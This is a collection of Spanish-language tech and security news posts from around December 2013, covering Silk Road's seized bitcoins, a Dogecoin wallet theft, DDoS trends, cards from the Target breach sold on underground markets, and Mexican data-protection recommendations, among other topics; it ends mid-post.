<div style="text-align: justify;"> El proceso que propone Typify es muy simple, con varias opciones para personalizar el espacio que vamos a crear. Siguiendo la misma dinámica de cualquier red social cuando iniciamos una cuenta, nos permite subir una fotografía, escribir unas líneas a nuestra biografía y buscar un fondo para nuestra portada.</div> <div style="text-align: justify;"> <br /></div> <div style="text-align: justify;"> Una vez que hemos completado todos nuestros datos personales, podemos conectar las redes sociales que utilizamos, así como otras plataformas web, tal como vemos en la ilustración:</div> <br /> <div style="text-align: center;"> <img alt="Typify.io" class="aligncenter size-full wp-image-156675" height="192" src="http://wwwhatsnew.com/wp-content/uploads/2013/12/Typify.io_.jpg" width="400" /></div> <div style="text-align: justify;"> <br /></div> <div style="text-align: justify;"> Un detalle interesante es que la página personal que nos permite crear Typify estará optimizada para cualquier tipo de dispositivo. Así que podremos compartir el enlace de nuestra página con la seguridad que todos nuestros contactos podrá visualizarla correctamente.</div> <div style="text-align: justify;"> <br /></div> <div style="text-align: justify;"> Si deseamos probar todas estas características, tendremos que solicitar una invitación dejando nuestro correo electrónico en la página de presentación de Typify.</div> <div style="text-align: justify;"> <br /></div> <div style="text-align: justify;"> Vía: <a href="http://www.checkapps.net/2013/12/Typify.io-pagina-personal-unificar-conectar-actividad-digital.html">Checkapps</a></div>

Si estamos buscando una forma interesante de crear y presentar una página personal, podemos tener en cuenta a Typify . Es un servici...

Leer más »

Creador de Silk Road pide la devolución de los bitcoins incautados

<div style="text-align: justify;"> Ross Ulbricht, creador del sitio <a href="http://blog.segu-info.com.ar/search/?q=seda">"Silk Road"</a>, asegura que la moneda virtual no es parte de las reglas de confiscación de EE.UU. El monto retirado tendría un valor de US$ 30 millones.<br /> <br /> Ulbricht, acusado de estar detrás de un mercado ilegal de drogas online, ha pedido al gobierno de Estados Unidos que le devuelva las <a href="http://blog.segu-info.com.ar/2013/10/el-fbi-secuestra-los-bitcoins-de-silk.html" rel="nofollow" target="_blank">"bitcoins" confiscadas de sus computadores, con un valor de más de US$ 30 millones</a>.</div> <div style="text-align: justify;"> </div> <div class="separator" style="clear: both; text-align: center;"> <a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhK3JIKrBVvkPkfVKnqECSlsmqVSSPjfFJoGVG9kCVRItxg3c4fThJG1P9Kc6_6R39b6Bthg-mfQsJUJutbxO-37SpQTgfy4Gr_lDXtvAULmlmQ-6jVZbpDeb-WWLCyhWpr5LCK5zHaQlmB/s1600/bitcoins.jpg" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhK3JIKrBVvkPkfVKnqECSlsmqVSSPjfFJoGVG9kCVRItxg3c4fThJG1P9Kc6_6R39b6Bthg-mfQsJUJutbxO-37SpQTgfy4Gr_lDXtvAULmlmQ-6jVZbpDeb-WWLCyhWpr5LCK5zHaQlmB/s1600/bitcoins.jpg" /></a></div> <div style="text-align: justify;"> <br /> <br /> Ross Ulbricht fue arrestado en octubre tras una redada del sitio "Silk Road", un verdadero mercado online de drogas.<br /> <br /> Investigadores federales en Nueva York aseguran que Ulbricht operaba bajo el seudónimo "Dread Pirate Roberts" (una referencia a la película <a href="http://www.imdb.com/title/tt0093779/" rel="nofollow" target="_blank">"The Princess Bride"</a>) y que convirtió el sitio en un lugar donde usuarios anónimos podían vender o comprar contrabando y servicios ilegales.<br /> <br /> Los documentos de la corte indican que se retiraron 144.336 bitcoins (una moneda virtual de gran crecimiento durante 2013) desde los computadores de Ulbricht. Aunque está sujeta a fluctuaciones, esta moneda es de alto valor y actualmente posee pocas regulaciones.<br /> <br /> En su petición, Ulbricht indica que sus bitcoins deberían ser devueltas ya que no son parte de las reglas de confiscación del gobierno de Estados Unidos.<br /> <br /> Fuente: <a href="http://www.noticiasdot.com/wp2/2013/12/24/creador-del-ebay-de-las-drogas-silk-road-pide-la-devolucin-de-los-bitcoins-incautados/">Noticias Dot</a></div> <div style="background-color: white; border: medium none; color: black; overflow: hidden; text-align: left; text-decoration: none;"> <br /></div>

Ross Ulbricht, creador del sitio "Silk Road" , asegura que la moneda virtual no es parte de las reglas de confiscación de EE.UU...

Leer más »

Juegos clásicos de consolas del siglo XX ahora en la web

<div style="text-align: justify;"> Gracias a Internet Archive tenemos ahora disponibles cientos de juegos de la década de los 70 y 80 que podían utilizarse en las consolas que podéis ver en la imagen.</div> <div style="text-align: justify;"> <br /></div> <div class="separator" style="clear: both; text-align: center;"> <a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhRgv_lxM4s0xtswGd5HMG5QgyoHfWqHCnGt3TOlN0znnzYFv3cR04cB1rlspj5WfcBFAfd43-OdVpv83c8yvF3bq4BkKoLdz7fuwIuLTic3rszuak5hWvZ_FNKIuIG7M42gLupkRtE_DPT/s1600/Ataris_70_80.jpg" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="293" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhRgv_lxM4s0xtswGd5HMG5QgyoHfWqHCnGt3TOlN0znnzYFv3cR04cB1rlspj5WfcBFAfd43-OdVpv83c8yvF3bq4BkKoLdz7fuwIuLTic3rszuak5hWvZ_FNKIuIG7M42gLupkRtE_DPT/s400/Ataris_70_80.jpg" width="400" /></a></div> <div style="text-align: justify;">  </div> <div style="text-align: justify;"> <br /></div> <div style="text-align: justify;"> En <a href="https://archive.org/details/consolelivingroom" target="_blank" title="consolelivingroom">archive.org/details/consolelivingroom</a> podemos ver los modelos y, al pulsar en cada uno de ellos, acceder a varios juegos que fueron desarrollados para dichas consolas, con la posibilidad de jugar a una versión web que permite emular el funcionamiento de cada uno.</div> <div style="text-align: justify;"> <br /></div> <div style="text-align: justify;"> Son en total 742 títulos que podemos probar, recordando cómo pasábamos las horas en 1983 con la tortuga que llevaba a los hijos a su casa, o con los vaqueros azules y rojos que se disparaban rebotando entre piedras. Por supuesto entre ellos tenemos “Asteroids”, de la Atari 7800 ProSystem, lanzado en 1986.</div> <div style="text-align: justify;"> <br /></div> <div style="text-align: justify;"> La Atari 2600, de 1977, es la que tiene la mayor lista de juegos disponibles: 528 títulos en total, con “Halo 2600″ entre ellos, inicio de los famoso Halo recreados en 2010.</div> <div style="text-align: justify;"> <br /></div> <div style="text-align: justify;"> Para poder disfrutarse online Internet Archive ejecuta el programa JSMESS, encargado de reproducir los ROM correspondientes.</div> <div style="text-align: justify;"> <br /></div> <div style="text-align: justify;"> Una joya dentro de un excelente museo en la web.</div>

Gracias a Internet Archive tenemos ahora disponibles cientos de juegos de la década de los 70 y 80 que podían utilizarse en las consolas ...

Leer más »

Analizan los datos de Facebook para detectar movimientos migratorios masivos

<div style="text-align: justify;"> Lo que veis en el mapa superior es uno de los resultados de un estudio que han realizado desde Facebook para mostrar cómo ha emigrado la gente de una ciudad a otra dentro del mismo país y entre regiones de países diferentes.</div> <div class="separator" style="clear: both; text-align: center;"> <a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEg5jOcLg5Xq7XjOT2g5deG-5921HzzhaTZhhJvbZqZb7AUOkz1QWIf1u-4h15ECoUTfI9o7vGahhM8ReIEDwkM2vQBgLvmDa4aOAkXCDVqjra6k5h5kSJAKx4Ie7sn6CCOXKnL6qTQnSq68/s1600/sshot-242-600x339.jpg" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="225" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEg5jOcLg5Xq7XjOT2g5deG-5921HzzhaTZhhJvbZqZb7AUOkz1QWIf1u-4h15ECoUTfI9o7vGahhM8ReIEDwkM2vQBgLvmDa4aOAkXCDVqjra6k5h5kSJAKx4Ie7sn6CCOXKnL6qTQnSq68/s400/sshot-242-600x339.jpg" width="400" /></a></div> <div style="text-align: justify;"> <br /></div> <div style="text-align: justify;"> Los datos, publicados por el equipo de <a href="https://www.facebook.com/notes/facebook-data-science/coordinated-migration/10151930946453859" target="_blank" title="facebook">Facebook Data Science</a> quieren mostrar información relacionada con las migraciones coordinadas, cambios de una ciudad a otra realizadas por un gran número de personas en un corto periodo de tiempo, algo extremadamente importante para analizar tanto patrones de comportamiento como índices de calidad de vida en diversas regiones del planeta.</div> <div style="text-align: justify;"> <br /></div> <div style="text-align: justify;"> En el mapa las ciudades de origen de las migraciones coordinadas están representados por puntos azules, las ciudades de destino son los puntos rojos, con un tamaño proporcional a la cantidad de personas que se cambiaron. En todos los casos las migraciones coordinadas están representados por un arco entre el origen y la ciudad de destino.</div> <div style="text-align: justify;"> <br /></div> <div style="text-align: justify;"> Para obtener esa información han analizado los perfiles que indican origen y ciudad de residencia actual. Entre los resultados relacionados con migraciones internacionales han destacado dos ejemplos interesantes de personas que llegan a Estados Unidos:</div> <div style="text-align: justify;"> <br /></div> <div style="text-align: justify;"> <strong>Migraciones de Cuba</strong>: la principal ciudad de destino es Miami, aunque reconocen que los cubanos que se mudan a los Estados Unidos son más propensos a tener acceso a Internet y a usar Facebook, por lo que los datos pueden estar exagerando el alcance de la migración coordinada procedente de Cuba.</div> <div style="text-align: justify;"> <br /></div> <div style="text-align: justify;"> <strong>Migraciones de México</strong>: Chicago, Houston, Dallas y Los Angeles son las preferidas, interpretando este fenómeno como la migración en cadena: una persona se mueve primero y luego se une a otras personas de la misma ciudad natal.</div> <div style="text-align: justify;"> <br /></div> <div style="text-align: justify;"> El estudio completo lo podéis ver en el enlace publicado anteriormente, divulgado por <a href="http://allfacebook.com/coordinated-migration_b127962" target="_blank" title="allfacebook">allfacebook.com</a> hace pocas horas.</div> <div style="text-align: justify;"> <br /></div> <div style="text-align: justify;"> <a href="http://wwwhatsnew.com/" target="_blank">Fuente </a></div>

Lo que veis en el mapa superior es uno de los resultados de un estudio que han realizado desde Facebook para mostrar cómo ha emigrado la ...

Leer más »

Recomendaciones en materia de Seguridad de Datos Personales (México)

<div style="text-align: justify;"> El gobierno de México ha publicado en el Diario oficial de la Federación (DOF) las <a href="http://www.dof.gob.mx/nota_detalle.php?codigo=5320179&fecha=30/10/2013" rel="nofollow" target="_blank">Recomendaciones en materia de Seguridad de Datos Personales</a> emitidas por el <a href="http://www.ifai.org.mx/" rel="nofollow" target="_blank">IFAI</a>, las cuales constituyen un marco de referencia respecto a las acciones que se consideran como las mínimas necesarias para la seguridad de los datos personales. La Recomendación General es la adopción de un Sistema de Gestión de Seguridad de Datos Personales (SGSDP) basado en el ciclo PHVA (Planear-Hacer-Verificar-Actuar).<br /> </div> <div style="text-align: justify;"> <blockquote class="tr_bq"> El artículo 19 de la Ley Federal de Protección de Datos Personales en Posesión de los Particulares (en adelante, la Ley) establece que: Todo responsable que lleve a cabo tratamiento de datos personales deberá establecer y mantener medidas de seguridad administrativas, técnicas y físicas que permitan proteger los datos personales contra daño, pérdida, alteración, destrucción o el uso, acceso o tratamiento no autorizado.</blockquote> El cumplimiento de las Recomendaciones podrá ser un factor a considerar para la reducción de sanciones en los casos que ocurra una vulneración a la seguridad de los datos personales, según lo establecido en el Artículo 58 del Reglamento de la Ley Federal de Protección de Datos Personales (RLFPDPPP).</div> <div style="text-align: justify;">  </div> <div class="separator" style="clear: both; text-align: center;"> <a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhQ0hV21c8fawZS0_hwp-8nMyr58ztYSyQ6_6kgvCXr22IQHPISa9dAA5GLleJxSpQ9smM022CYcHMbOm-53UUjBVqfXMqBZkN6ufqShGxJOFLMufG8Xw9zFBPOuz10fYNNNuf4ts3C327a/s1600/shutterstock.jpg" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="180" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhQ0hV21c8fawZS0_hwp-8nMyr58ztYSyQ6_6kgvCXr22IQHPISa9dAA5GLleJxSpQ9smM022CYcHMbOm-53UUjBVqfXMqBZkN6ufqShGxJOFLMufG8Xw9zFBPOuz10fYNNNuf4ts3C327a/s320/shutterstock.jpg" width="320" /></a></div> <div style="text-align: justify;"> <br /><br /> Junto con las Recomendaciones el IFAI ha presentado en su sitio web dos documentos, una Guía para implementar un Sistema de Gestión de Seguridad de Datos Personales y la Metodología de Análisis de Riesgo BAA.<br /><br /> Las Recomendaciones y la Guía responden al "¿Qué y Cómo?" para instruir a responsables, encargados y cualquier otro interesado sobre los pasos clave de la implementación de un SGSDP, orientado a la mejora continua y a lograr un nivel aceptable de riesgo, de acuerdo al modelo y objetivos de la organización. Además, próximamente se dará a conocer un Manual en materia de Seguridad de Datos Personales para MIPYMES, que contendrá de manera simplificada los objetivos del SGSDP.<br /><br /> La Guía es un ejercicio de concreción, síntesis y armonización de diferentes estándares internacionales como BS 10012, ISO 27001, ISO 27002, NIST SP 800-14 entre otros, de los cuales el IFAI recomienda su consulta para la adecuada gestión de la seguridad de los datos personales, en este sentido las organizaciones que ya tienen madurez en el tema de seguridad o sistemas de gestión encontrarán que la implementación de un SGSDP no representa una carga adicional, sino un esquema de trabajo que se puede acoplar y documentar con sus esquemas ya existentes.<br /><br /> Por su parte la Metodología BAA, aunque no forma parte de las Recomendaciones, es una propuesta innovadora en muchos aspectos respecto a su enfoque de la valoración del riesgo, considerando tres variables: el Beneficio que representan los datos personales para un atacante, la Anonimidad que puede tener el atacante y la Accesibilidad a los entornos.<br /><br /> Más allá del incentivo que representa la posible atenuación de multas, todo aquel involucrado en el tratamiento de datos personales debe considerar el valor de implementar un SGSDP: primero, porque la protección de datos personales es un derecho fundamental de los ciudadanos, segundo, el SGSDP ayuda a prevenir y mitigar los efectos de una vulneración a la seguridad, finalmente, para evitar pérdidas económicas debido a compensación de daños y pérdida de clientes.<br /><br /> En suma, la protección de los datos personales habilita el comercio y aumenta la competitividad, gracias al aumento de la confianza de los consumidores e inversionistas, por ello las <a href="http://www.dof.gob.mx/nota_detalle.php?codigo=5320179&fecha=30/10/2013&print=true" rel="nofollow" target="_blank">Recomendaciones y la Guía</a> son herramientas de alto impacto para alcanzar estos objetivos.<br /><br /> Fuente: <a href="http://www.bsecure.com.mx/opinion/recomendaciones-en-materia-de-seguridad-de-datos-personales/" rel="nofollow" target="_blank">bSecure</a></div> <div style="background-color: white; border: medium none; color: black; overflow: hidden; text-align: left; text-decoration: none;"> <br /></div>

El gobierno de México ha publicado en el Diario oficial de la Federación (DOF) las Recomendaciones en materia de Seguridad de Datos Persona...

Leer más »

Roban 13.000 dólares en Dogecoin, la alternativa al Bitcoin

<div style="text-align: justify;"> Empezó como una broma y se convirtió en una nueva moneda virtual con bastantes seguidores. El <strong>Dogecoin</strong> (<a href="http://dogecoin.com/" target="_blank" title="dogecoin">dogecoin.com</a>) es conocido por la carita de perro manso en sus “monedas”, un proyecto que nació como una moneda de código libre y que ganó mucha popularidad en reddit, apareciendo en algunos <a href="http://rbidocs.rbi.org.in/rdocs/PressRelease/PDFs/IEPR1261VC1213.pdf?a" target="_blank" title="rbi">documentos oficiales del gobierno indio</a> en la sección de “evitemos este tipo de monedas”.</div> <div style="text-align: justify;"> <br /></div> <div style="text-align: justify;"> El caso es que al mismo tiempo que gana la atención de inversores y adictos a la aventura financiera, también gana la atención de aquéllos que acostumbran a robar, y así ha sido. La víctima es <strong>Dogewallet</strong> (<a href="http://dogewallet.com/" target="_blank" title="dogewallet">dogewallet.com</a>), un monedero de este tipo de monedas que ha visto como 21 millones de dogecoins han desaparecido de su base de datos, sumando un total de 13.000 dólares.</div> <div style="text-align: justify;"> <br /></div> <div class="separator" style="clear: both; text-align: center;"> <a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgwn5A0a3t1SEIsPd3flJYXJWoZ5OSq9Cqn9K_TAlRWOTEHX-ENSZZw7XE9BiIdIc9uBXeX8gFL_p_U5o4tDsJiUZo6tZb51fl-BXc6Zf9l9UtSY1czKN-aHA8Z6e1W_9bRA-k4wJW_v-r7/s1600/sshot-712.jpg" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="291" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgwn5A0a3t1SEIsPd3flJYXJWoZ5OSq9Cqn9K_TAlRWOTEHX-ENSZZw7XE9BiIdIc9uBXeX8gFL_p_U5o4tDsJiUZo6tZb51fl-BXc6Zf9l9UtSY1czKN-aHA8Z6e1W_9bRA-k4wJW_v-r7/s320/sshot-712.jpg" width="320" /></a></div> <div style="text-align: justify;"> <br /></div> <div style="text-align: justify;"> <br /></div> <div style="text-align: justify;"> Mientras los robados se quejan en el foro <a href="http://doges.org/index.php/topic,5283.0.html" target="_blank" title="doges">doges.org</a>, Dogewallet informa que devolverá el dinero a los afectados, aunque de momento ha cerrado sus puertas para evitar pérdidas mayores con posibles nuevos ataques.</div> <div style="text-align: justify;"> <br /></div> <div style="text-align: justify;"> Los dogecoins son más fáciles de minar (ya se ha minado el 14% de los previstos) y, aunque el valor es mucho menos que el de los bitcoins, está creciendo bastante durante las últimas semanas, aunque parece que nadie se libra de los <em>criptoladrones</em>.</div> <div style="text-align: justify;"> <br /></div> <div style="text-align: justify;"> <a href="http://wwwhatsnew.com/" target="_blank">Fuente </a></div>

Empezó como una broma y se convirtió en una nueva moneda virtual con bastantes seguidores. El Dogecoin ( dogecoin.com ) es conocido por l...

Leer más »

Google, pensando en construir el asistente personal definitivo

<div style="text-align: justify;"> Leemos en <a href="http://techcrunch.com/2013/12/25/google-wants-to-build-the-ultimate-personal-assistant/?ncid=reddit_social_share">TC</a> una interesante noticia anunciada en el evento parisino LeWeb, en el que el director de ingeniería de Google Scott Huffman nos ha anunciado la dirección que tomará Google Search en los próximos meses.</div> <div style="text-align: justify;"> <br /></div> <div style="text-align: justify;"> Partiendo de la idea de que nuestras expectativas respecto a cómo tiene que funcionar un motor de búsqueda cambian continua y rápidamente, y de que cada vez se queda más anticuada la mecánica de los “diez enlaces azules” desplegados en primera página, Google pretende cambiar el chip respecto a su Search y ofrecernos una herramienta que se parezca más a un asistente personal. Huffman nos explica que la próxima generación se basará, exclusivamente, en hacer que nuestras tareas diarias se conviertan en algo más simple y rápido.</div> <div style="text-align: justify;"> <br /></div> <div class="separator" style="clear: both; text-align: center;"> <a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEiQMLIA3nBU-gyAjSyt1HtyDJ6DJqV_VhyphenhyphenN7mimSGFxN4h0sQIbLf-fqoBHIlPRZwnZFatgWeON3tTQxslq7Xq1EuFW_JZNsZFL4taHy8AGiaoRyp81HHwhL_Fw6sjghNJCV4qT4zhiOybY/s1600/sshot-512-600x258.jpg" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="171" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEiQMLIA3nBU-gyAjSyt1HtyDJ6DJqV_VhyphenhyphenN7mimSGFxN4h0sQIbLf-fqoBHIlPRZwnZFatgWeON3tTQxslq7Xq1EuFW_JZNsZFL4taHy8AGiaoRyp81HHwhL_Fw6sjghNJCV4qT4zhiOybY/s400/sshot-512-600x258.jpg" width="400" /></a></div> <div style="text-align: justify;"> <br /></div> <div style="text-align: justify;"> <br /></div> <div style="text-align: justify;"> Se comentaba en la conferencia que un medio en el que integrar Google Search podría ser perfectamente el vehículo, o en dispositivos que ni siquiera dispongan de pantalla: en los que simplemente interactuemos mediante la conversación, utilizando en estos casos sólamente micrófonos y altavoces cuyo reconocimiento funcione a través de un “ok Google”.</div> <div style="text-align: justify;"> <br /></div> <div style="text-align: justify;"> Por ahora, el principio de esta idea existe en forma de Google reconociendo unos 38 lenguajes y más de 18 mil millones de hechos y cómo se conectan entre ellos, hechos que potencialmente son los que conformarían el Google del futuro: un asistente proactivo y que conozca nuestros hábitos, costumbres y gustos personales con el fin de ofrecernos la información más directa posible.</div> <div style="text-align: justify;"> <br /></div> <div style="text-align: justify;"> Fuente: <a href="http://wwwhatsnew.com/2013/12/26/google-pensando-en-construir-el-asistente-personal-definitivo/" target="_blank">Enlace </a></div>

Leemos en TC una interesante noticia anunciada en el evento parisino LeWeb, en el que el director de ingeniería de Google Scott Huffman ...

Leer más »

Ataques DDoS: más sofisticados y constantes

<div style="text-align: justify;"> Los ataques distribuidos de denegación de servicio (DDoS, por sus siglas en inglés) son un pilar del arsenal con que cuentan los hackers para vulnerar. Su importancia es tal que de 2011 a la fecha este elemento por sí mismo ha evolucionado para hacer mayor daño a las instituciones gubernamentales y a las organizaciones que hacen transacciones en línea o tienen importantes inversiones de su marca en el web.<br /> <br /> Al ejecutar un ataque DDoS, lo que se pretende es dejar fuera de servicio un sistema Web saturando y consumiendo todo el ancho de banda disponible en el mismo. En gran parte, su creciente uso obedece a que es cada vez más fácil conseguir avanzados kits de herramientas de ataque DDoS, a menudo gratuitos. De ahí que, según cifras de Akamai, firma de seguridad IT basada en la Nube, de 2010 a 2012 este tipo de amenaza se ha triplicado en todo el orbe.</div> <div style="text-align: justify;"> <br /></div> <div class="separator" style="clear: both; text-align: center;"> <a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjqjT4MJ56hyerzy9qYS1ZBWs2sfe0Gq1HGL0DQMu6KnQ3doRITZzxDJq24y8TEJqdHqYUgEU4peweLH5lMtWFT8yx6NxS22etugyXNXR4pGCZ-GkAIOLLxzgPF07cuMNVkBFuoirwZlhm6/s1600/Ddos_2.jpg" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="244" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjqjT4MJ56hyerzy9qYS1ZBWs2sfe0Gq1HGL0DQMu6KnQ3doRITZzxDJq24y8TEJqdHqYUgEU4peweLH5lMtWFT8yx6NxS22etugyXNXR4pGCZ-GkAIOLLxzgPF07cuMNVkBFuoirwZlhm6/s320/Ddos_2.jpg" width="320" /></a></div> <div style="text-align: justify;"> <br /> <br /> Pero, ¿cuál es el objetivo primordial? Lejos de lo que pudiera pensarse, la motivación no es siempre la de obtener dinero de la empresa vulnerada a cambio de hacer cesar el ataque: de acuerdo con Daniel Villanueva, vicepresidente de Arbor Networks para América Latina, esto sucede así solo en 27% de los casos a nivel global. El ataque también puede ser un distractor para cubrir la penetración de un sistema central o la fuga de información, o bien puede deberse a mero vandalismo. Con todo, la mayor parte de los ataques DDoS (33%) son motivados por razones ideológicas o políticas.<br /> <br /> Por citar un ejemplo, está el caso que se dio en Filipinas el año pasado: en protesta por el asesinato de un pescador a manos de la policía local sin respetar sus derechos, se dio un ataque distribuido de denegación de servicio que dejó sin internet al país entero por una semana.<br /> Villanueva, entrevistado, dejó ver la situación de México: a nivel regional, este país fue el objetivo de la mitad de los ataques DDoS perpetuados a gobiernos en los últimos dos años.<br /> <br /> En cuanto a la sofisticación, es notoria la forma en que los ataques han ido mutando de 2011 a la fecha: “En el sector público, en una hora se pueden detectar 30 tipos de ataques distintos, incluyendo ataques a servidores, DNS, etcétera. Esa es la tendencia: cambiar rápido el vector de ataque, y en materia de DDoS mezclar los ataques volumétricos con los de aplicación”, dijo el directivo de Arbor Networks.<br /> <br /> En este sentido, un reciente estudio de Radware, empresa de soluciones de seguridad, aplicado durante este año deja ver que 56% de los ataques distribuidos de denegación de servicio se dirigen a aplicaciones, y el resto a redes, siendo el sector de servicios financieros el que más ataques DDoS ha recibido en el mundo.<br /> <br /> También está aumentando la intensidad. Es conocido el caso de DDoS contra Spamhaus, perpetrado a principios de año, el cual rompió récord al arrojar 300 Gigabits por segundo (Gbps) de datos falsos. A decir de Villanueva, en la región latinoamericana ya se han visto ataques de 100 Gbps aunque el promedio actualmente es de 10 Gbps.<br /> <br /> Fuente: <a href="http://www.bsecure.com.mx/featured/ataques-ddos-mas-sofisticados-y-constantes/" rel="nofollow" target="_blank">bSecure</a></div> <div style="background-color: white; border: medium none; color: black; overflow: hidden; text-align: left; text-decoration: none;"> <br /></div>

Los ataques distribuidos de denegación de servicio (DDoS, por sus siglas en inglés) son un pilar del arsenal con que cuentan los hackers p...

Leer más »

Tarjetas de crédito y débito a la venta en línea

El reciente ataque a la empresa Target en donde robaron 40 millones de tarjetas de débito y crédito, permitió a los delincuentes crear un "nuevo producto": cientos de miles de tarjetas en blanco emitidas por bancos fuera de Estados Unidos y que se están utilizando en todo el mundo.<br /> <div class="separator" style="clear: both; text-align: center;"> <a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEghVRnRS2xPCrw-YG3kA9GEt8dluVl-exWuh91Bq_pLV5Rly2zV87udnm5MKoIMbBvGc3esRzbZKLEfDmFDs0z285-W8PNjd8MmvO-L0WpJ3gHTQgvc_AUiMX1e6tUHX8ttfQpItXYwEaiT/s1600/owned.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="265" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEghVRnRS2xPCrw-YG3kA9GEt8dluVl-exWuh91Bq_pLV5Rly2zV87udnm5MKoIMbBvGc3esRzbZKLEfDmFDs0z285-W8PNjd8MmvO-L0WpJ3gHTQgvc_AUiMX1e6tUHX8ttfQpItXYwEaiT/s320/owned.png" width="320" /></a></div> <br /> El 20 de diciembre <a href="http://krebsonsecurity.com/2013/12/cards-stolen-in-target-breach-flood-underground-markets/">Brain Krebs publicó una historia acerca del sitio rescatador [dot] la</a> donde explica cómo dos bancos compraron tarjetas a los ladrones para descubrir cómo obtenían los números de tarjeta de crédito que luego codifican en nuevas tarjetas en blanco y las utilizan para ir de compras.<br /> <br /> <a href="http://1.bp.blogspot.com/-WSnWhqgF0K4/Urg0C4U4duI/AAAAAAAALrw/dMPxy-9fMGY/s1600/rescator.png" style="clear: right; float: right; margin-bottom: 1em; margin-left: 1em;"><img border="0" height="162" src="http://1.bp.blogspot.com/-WSnWhqgF0K4/Urg0C4U4duI/AAAAAAAALrw/dMPxy-9fMGY/s200/rescator.png" style="display: inline;" width="200" /></a>Una característica clave de esa tienda en particular es que cada tarjeta se asigna a un determinado nombre "base". El término escogido es un argot que se refiere a una palabra código arbitraria que describe todas las tarjetas robadas de un comerciante específico. En ese primer caso el nombre base fue "Tortuga".<br /> <br /> Ahora se publicó una <a href="http://krebsonsecurity.com/2013/12/non-us-cards-used-at-target-fetch-premium/">segunda operación llamada Operation Barbarossa</a>, que consta de más de 330.000 débito y tarjetas de crédito emitidas por bancos en Europa, Asia, América Latina y Canadá.<br /> <br /> Según una gran banco en los Estados Unidos que adquirió el muestreo de las tarjetas a través de varios países, todas las tarjetas en la base de Barbarossa también fueron utilizados durante el período de tiempo de la brecha de Target.<br /> <br /> <div class="separator" style="clear: both; text-align: center;"> <a href="http://krebsonsecurity.com/wp-content/uploads/2013/12/barb-all.png" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="206" src="http://krebsonsecurity.com/wp-content/uploads/2013/12/barb-all.png" style="display: inline;" width="400" /></a></div> <br /> Las tarjetas para la venta en la base de Barbarossa varían en precio desde U$S 23,62 a U$S 315 por tarjeta. Los precios parecen estar influenciados por una serie de factores, incluyendo el banco emisor, el tipo de tarjeta (débito o crédito), qué tan pronto expire la tarjeta y si la tarjeta tiene una notación especial que a menudo indica un límite superior de crédito, como por ejemplo una tarjeta platino.<br /> <br /> Los precios también parecen estar influenciados por lo raro que es encontrar tarjetas de un banco específico disponible en el mercado negro. Las tarjetas más caras fueron emitidas por los bancos en Singapur, Corea del sur y los Emiratos Árabes Unidos.<br /> <br /> Fuente: <a href="http://krebsonsecurity.com/2013/12/non-us-cards-used-at-target-fetch-premium/" rel="nofollow" target="_blank">Krebs on Security</a><br /> <div style="background-color: white; border: medium none; color: black; overflow: hidden; text-align: left; text-decoration: none;"> <br /></div>

El reciente ataque a la empresa Target en donde robaron 40 millones de tarjetas de débito y crédito, permitió a los delincuentes crear un &...

Leer más »

Revelan manual secreto para interrogaciones del FBI al querer registrar su copyright

<div style="text-align: justify;"> Quién sabe por qué el autor del manual quiso registrar una obra que supuestamente era ultra secreta.<br /> <br /> El reconocido medio liberal estadounidense <a href="http://www.motherjones.com/politics/2013/12/fbi-copyrighted-interrogation-manual-unredacted-secrets" rel="nofollow" target="_blank">Mother Jones</a> reveló recientemente una historia bastante extraña: El FBI tiene <b>un manual ultrasecreto de 78 páginas para interrogaciones</b>, al que han intentado acceder durante años la ONG más grande de ese país, la <a href="https://www.aclu.org/" rel="nofollow" target="_blank">Unión Estadounidense por las Libertades Civiles</a> (aunque en 2012 el FBI finalmente les entregó <a href="https://www.aclu.org/files/fbimappingfoia/20120727/ACLURM036782.pdf" rel="nofollow" target="_blank">una copia del manual, pero que venía fuertemente censurada</a>).<br /> <br /> Curiosamente, en enero del 2010 el agente de alto rango del FBI que escribió el manual<b> quiso registrarlo para obtener los derechos de autor</b>, lo que significa que como parte del trámite debió entregarle una copia a la Biblioteca del Congreso norteamericano, quienes durante años han tenido sin saberlo esta copia del manual sin censura disponible a todos los ciudadanos con su tarjeta de la biblioteca pública.</div> <div class="separator" style="clear: both; text-align: center;"> <a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgRw6_Bv0UClVxTapaBHlTB_5KeonTmbcge3BwkbByBC1nmsMIyxURr94QxBY6NqxMQOdr094GKzkLIGEFiBk8kdL-klvnyPoe6zJ4ke_A-iZGAFnQ99nwGLKZm4F1WMQ2l4tUo6rKAaP1P/s1600/Hacked_twitter_doble_autenticacion.jpg" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="244" 